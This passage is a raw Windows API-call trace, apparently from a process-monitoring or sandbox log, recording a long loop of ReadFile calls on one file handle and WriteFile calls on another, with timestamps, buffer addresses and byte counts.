lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.239] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.239] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x256, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.240] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.240] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.241] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.241] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.242] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.242] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x188, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.243] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.243] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.244] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x115, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.244] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.245] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.245] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.245] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.246] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.246] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x143, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.247] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.247] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.248] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1c8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.248] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.249] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.253] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3bf, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.253] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.254] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.254] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.255] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.255] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.256] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.256] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.257] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.257] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x366, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.258] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.258] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.259] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x24d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.259] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.260] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.260] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1fe, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.261] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.261] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.262] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x9c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.262] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.263] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.263] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.264] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.264] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.265] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x273, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.266] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.266] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.267] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xa1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.267] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.268] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.268] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.269] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x10b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.269] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.270] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.270] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.271] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.271] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.272] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.273] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.273] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.274] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x37b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.274] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.275] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.275] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.276] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.276] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.277] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x18c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.277] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.278] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3f3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.278] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.279] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.279] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1dc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.280] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.280] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.281] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x16c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.281] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.282] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.282] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x214, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.283] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.283] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.284] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1c9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.285] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.285] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.286] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x262, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.286] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.286] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.287] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.288] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.288] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.289] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.289] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x74, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.289] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.290] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.291] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x38c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.291] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.292] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.292] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.293] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, 